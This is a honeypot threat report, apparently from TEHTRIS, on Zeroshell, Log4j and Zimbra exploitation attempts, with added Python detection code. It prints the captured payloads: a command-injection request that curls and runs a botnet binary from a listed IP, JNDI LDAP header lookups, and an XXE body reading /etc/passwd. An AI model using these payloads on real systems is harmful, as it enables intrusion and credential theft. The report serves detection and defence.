These past two weeks, the international TEHTRIS honeypots were again relentlessly hit by suspected malicious activity. The honeypots located in Southeast America, in South and Northeast Asia Pacific and in Western Europe were the most targeted. Here is an extract of some of the attack attempts that were detected.
Attempts to exploit CVE-2019-12725 on German and Portuguese honeypots
Two malicious IP addresses were detected by TEHTRIS NTA performing inbound Zeroshell remote code execution (RCE) attempts. Some of our European honeypots could indeed have been compromised through CVE-2019-12725 (CVSSv3: 9.8).
The US IP 4.71.37[.]46, hosted by AS 3356 LEVEL3, performed several dozen hits on Germany and Portugal. This IP address is listed in public databases of malicious IP addresses.
The Chinese IP 36.110.214[.]195, hosted by AS 23724 IDC, China Telecommunications Corporation, is not listed in public databases of malicious IPs. It performed only one hit, on a German honeypot.
The following request carries the download-and-execute command for the Zero botnet payload:
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0
URL decode: “;cd /tmp;curl -O http://5.206.227[.]228/zero;sh zero;”
The IP address embedded in the request above (5.206.227[.]228), likely a C2, is a known Portuguese address used for exploiting Zeroshell. It is hosted by AS 47674 Net Solutions – Consultoria Em Tecnologias De Informacao, Sociedade Unipessoal LDA.
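As an added example (not part of the TEHTRIS report), the following Python checks web-server request lines for this kerbynet command-injection pattern from the defender's side: it percent-decodes each query parameter, flags shell metacharacters in the decoded values, and extracts any download URL as an IoC for blocking. The sample request lines are constructed for the example; the first reproduces the request shown above, the others are benign negative cases.

```python
import re
from urllib.parse import unquote, urlsplit

# Shell metacharacters that never belong in a kerbynet query parameter value.
SHELL_META = re.compile(r"[;|`]|\$\(|&&|\|\|")
# A URL embedded in an injected command, e.g. the payload download location.
URL_IN_CMD = re.compile(r"https?://[^\s;\"'|`]+")
# Unauthenticated CGI endpoint named in the report.
KERBYNET_PATH = "/cgi-bin/kerbynet"

# Constructed sample request lines: the first reproduces the request from the
# report, the other two are benign traffic used as negative cases.
SAMPLE_REQUEST_LINES = [
    "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;"
    "curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0",
    "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=user HTTP/1.0",
    "GET /index.html?q=a;b HTTP/1.1",
]


def parse_query(query: str) -> dict:
    """Split a raw query string on '&' only and percent-decode each part.

    Done by hand rather than with urllib.parse.parse_qs because older Python
    versions also split on ';', which would chop the injected command into
    separate harmless-looking parameters and hide it from the check below.
    """
    params = {}
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def analyze_request_line(request_line: str) -> dict:
    """Decode one HTTP request line and report injected parameters and IoCs."""
    _method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    params = parse_query(parts.query)
    injected = []
    download_urls = []
    for key, value in params.items():
        if SHELL_META.search(value):
            injected.append(key)
            download_urls.extend(URL_IN_CMD.findall(value))
    is_kerbynet = parts.path.endswith(KERBYNET_PATH)
    return {
        "path": parts.path,
        "injected_params": injected,
        "download_urls": download_urls,
        # Metacharacters reaching the kerbynet CGI is the RCE signature.
        "suspicious": is_kerbynet and bool(injected),
    }


def scan(request_lines) -> list:
    """Return the analysis of every request line judged suspicious."""
    results = (analyze_request_line(line) for line in request_lines)
    return [r for r in results if r["suspicious"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUEST_LINES):
        print(f"{hit['path']}: injected via {hit['injected_params']}, "
              f"fetches {hit['download_urls']}")
```

The extracted URL is what goes on the blocklist; the third sample shows why the decision is tied to the vulnerable path rather than to a bare semicolon, which appears in plenty of legitimate query strings.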
Log4j exploit attempts on a Swedish honeypot
One of our Swedish honeypots has been the target of a large number of “jndi” requests, which are known to be used in attempts to exploit the Log4j vulnerability on devices.
27 IP addresses sent the following set of headers, which was the most frequently seen variant:
origin: $ {jndi:ldap://:8182/a}
x-api-version: $ {jndi:ldap://:8182/a}
x-att-deviceid: $ {jndi:ldap://:8182/a}
proxy-connection: $ {jndi:ldap://:8182/a}
prefer: $ {jndi:ldap://:8182/a}
accept: */*
upgrade-insecure-requests: $ {jndi:ldap://:8182/a}
warning: $ {jndi:ldap://:8182/a}
a-im: $ {jndi:ldap://:8182/a}
x-request-id: $ {jndi:ldap://:8182/a}
from: $ {jndi:ldap://:8182/a}
forwarded: $ {jndi:ldap://:8182/a}
access-control-request-method: $ {jndi:ldap://:8182/a}
dnt: $ {jndi:ldap://:8182/a}
cache-control: $ {jndi:ldap://:8182/a}
x-uidh: $ {jndi:ldap://:8182/a}
authorization: $ {jndi:ldap://:8182/a}
accept-encoding: gzip
x-wap-profile: $ {jndi:ldap://:8182/a}
access-control-request-headers: $ {jndi:ldap://:8182/a}
x-forwarded-proto: $ {jndi:ldap://:8182/a}
pragma: $ {jndi:ldap://:8182/a}
date: $ {jndi:ldap://:8182/a}
x-forwarded-host: $ {jndi:ldap://:8182/a}
x-correlation-id: $ {jndi:ldap://:8182/a}
x-requested-with: $ {jndi:ldap://:8182/a}
front-end-https: $ {jndi:ldap://:8182/a}
http2-settings: $ {jndi:ldap://:8182/a}
x-csrf-token: $ {jndi:ldap://:8182/a}
The other header sets observed are identical except for the port number, which varies across the range 8180 to 8189 instead of 8182.
Here are the top 10 IoCs, all listed in public databases of malicious IPs:
IP | AS | Country |
93.91.117[.]60 | AS 47562 Fast Link Ltd | RU |
120.236.74[.]234 | AS 9808 China Mobile Communications Group Co., Ltd. | CN |
85.51.217[.]156 | AS 12479 Orange Espagne SA | ES |
118.41.204[.]72 | AS 4766 Korea Telecom | KR |
222.103.98[.]58 | AS 4766 Korea Telecom | KR |
72.132.58[.]237 | AS 20001 TWC-20001-PACWEST | US |
178.140.136[.]178 | AS 42610 Rostelecom | RU |
223.171.91[.]144 | AS 17853 LGTELECOM | KR |
46.170.151[.]34 | AS 5617 Orange Polska Spolka Akcyjna | PL |
147.182.233[.]56 | AS 14061 DIGITALOCEAN-ASN | US |
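As an added example (not from the report), the following Python reproduces the two steps behind the observations above from captured headers: a scanner that flags every header carrying a JNDI lookup and pulls out the callback scheme, host and port, and an aggregation that counts hits per source and lists the ports seen, which is how a table of IoCs like the one above is built. The header names are taken from the capture above; the source IPs (documentation ranges) and the port choices are constructed for the example.

```python
import re
from collections import Counter

# A JNDI lookup anywhere in a header value. Whitespace between '$' and '{'
# is tolerated because that is how the captured headers are printed.
JNDI_LOOKUP = re.compile(
    r"\$\s*\{\s*jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]*)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)

# Subset of the header names from the captured request above.
PROBED_HEADERS = [
    "origin", "x-api-version", "x-att-deviceid", "proxy-connection",
    "x-request-id", "authorization", "x-forwarded-host", "x-csrf-token",
]


def jndi_probe_headers(port: int) -> list:
    """Build the header set seen in the capture for one callback port (constructed)."""
    probes = [f"{name}: $ {{jndi:ldap://:{port}/a}}" for name in PROBED_HEADERS]
    return probes + ["accept: */*", "accept-encoding: gzip"]


# Constructed events (source IP plus request headers). 192.0.2.x and
# 198.51.100.x are documentation ranges, not the addresses from the report.
SAMPLE_EVENTS = [
    {"src_ip": "192.0.2.10", "headers": jndi_probe_headers(8182)},
    {"src_ip": "192.0.2.10", "headers": jndi_probe_headers(8185)},
    {"src_ip": "198.51.100.7", "headers": ["host: honeypot.example",
                                            "accept: */*",
                                            "user-agent: curl/7.68.0"]},
    {"src_ip": "198.51.100.20", "headers": jndi_probe_headers(8189)},
]


def scan_headers(headers) -> list:
    """Return one finding per header that carries a JNDI lookup."""
    findings = []
    for header in headers:
        name, _, value = header.partition(":")
        match = JNDI_LOOKUP.search(value)
        if match:
            findings.append({
                "header": name.strip().lower(),
                "scheme": match["scheme"].lower(),
                "host": match["host"],
                "port": int(match["port"]) if match["port"] else None,
            })
    return findings


def summarize(events) -> dict:
    """Aggregate per-source hit counts, callback ports and abused header names."""
    hits = Counter()
    ports = set()
    header_names = set()
    for event in events:
        findings = scan_headers(event["headers"])
        if not findings:
            continue  # benign request, nothing to count
        hits[event["src_ip"]] += 1
        for finding in findings:
            header_names.add(finding["header"])
            if finding["port"] is not None:
                ports.add(finding["port"])
    return {
        "top_sources": hits.most_common(),
        "ports": sorted(ports),
        "headers": sorted(header_names),
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_EVENTS)
    for ip, count in report["top_sources"]:
        print(f"{ip}: {count} request(s) carrying JNDI lookups")
    print("callback ports seen:", report["ports"])
```

Scanning every header rather than a fixed list matters here: as the capture shows, the lookup was sprayed across almost thirty header names, so a rule keyed on User-Agent alone would have missed it.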
Attempts to exploit CVE-2019-9621 on European honeypots by a Russian IP
Thanks to TEHTRIS NTA, which automatically detects anomalies in traffic, we observed over these past two weeks an increase in attempts to exploit CVE-2019-9621 (CVSSv3: 7.5), which affects Zimbra versions prior to 8.8.11. Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows server-side request forgery (SSRF) and XML External Entity (XXE) injection via the ProxyServlet component.
The Russian IP address 152.89.196[.]211 (AS 57523 Chang Way Technologies Co. Limited) performed hundreds of requests against all our TEHTRIS European honeypots during the second half of February. This IP, identified as malicious in public databases, first attacked our honeypots on 10 January.
Here is one example of the requests seen in an NTA packet capture:
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: xx.x.xxx.xx:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length: 314
Content-Type: application/xml
Accept-Encoding: gzip
Connection: close

<!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
The external entity declaration pointing at file:///etc/passwd is an attempt to read that file, which notably contains the list of the machine's user accounts; the &xxe; reference in AcceptableResponseSchema is where its content would be expanded.
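As an added example (neither the report's nor Zimbra's code), the following Python shows the check a defender would put in front of an XML endpoint such as this one: reject any request body that declares a DTD at all, since XXE needs one and legitimate Autodiscover requests carry none, and record which external entities it tried to declare and expand. The malicious body reproduces the captured request above; the benign Autodiscover body and the function names are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# Any DTD is grounds for rejection: XXE requires an entity declaration.
DOCTYPE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# External (SYSTEM/PUBLIC) entity declarations, general or parameter (%),
# extracted for logging only. Double-quoted literals are handled; the
# accept/reject decision above does not depend on this pattern.
EXTERNAL_ENTITY = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>]+)\s+(?P<kind>SYSTEM|PUBLIC)\s+"
    r"(?:\"[^\"]*\"\s+)?\"(?P<uri>[^\"]*)\"",
    re.IGNORECASE,
)

# Body of the captured request, as shown in the report.
MALICIOUS_BODY = (
    '<!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]> '
    '<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> '
    '<Request> <EMailAddress>aaaaa</EMailAddress> '
    '<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema> </Request> </Autodiscover>'
)

# Constructed benign request: same element layout, no DTD.
BENIGN_BODY = (
    '<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">'
    '<Request><EMailAddress>user@example.com</EMailAddress>'
    '<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>'
    '</Request></Autodiscover>'
)


def inspect_xml_body(body: str) -> dict:
    """Decide whether a body may be parsed and describe any external entities in it."""
    has_doctype = DOCTYPE.search(body) is not None
    external = [
        {"name": m["name"], "kind": m["kind"].upper(), "uri": m["uri"],
         "parameter": m["param"] is not None}
        for m in EXTERNAL_ENTITY.finditer(body)
    ]
    # Entities both declared and expanded in the document: the actual read point.
    referenced = sorted(e["name"] for e in external if f"&{e['name']};" in body)
    return {
        "accept": not has_doctype,
        "has_doctype": has_doctype,
        "external_entities": external,
        "referenced": referenced,
    }


def local_name(tag: str) -> str:
    """Strip the namespace prefix ElementTree puts in front of a tag."""
    return tag.rsplit("}", 1)[-1]


def handle_autodiscover(body: str) -> dict:
    """Return the requested EMailAddress, or an error if the body carried a DTD."""
    verdict = inspect_xml_body(body)
    if not verdict["accept"]:
        uris = [e["uri"] for e in verdict["external_entities"]]
        return {"ok": False, "error": f"DTD rejected; external entities: {uris}"}
    root = ET.fromstring(body)  # only reached for DTD-free documents
    for element in root.iter():
        if local_name(element.tag) == "EMailAddress":
            return {"ok": True, "email": (element.text or "").strip()}
    return {"ok": False, "error": "no EMailAddress element"}


if __name__ == "__main__":
    for label, body in (("captured", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, "->", handle_autodiscover(body))
```

Rejecting on the DOCTYPE rather than on the word SYSTEM is deliberate: it also stops parameter-entity and out-of-band variants that never reference /etc/passwd directly, and it matches the usual hardening advice of disabling DTD processing in the parser itself.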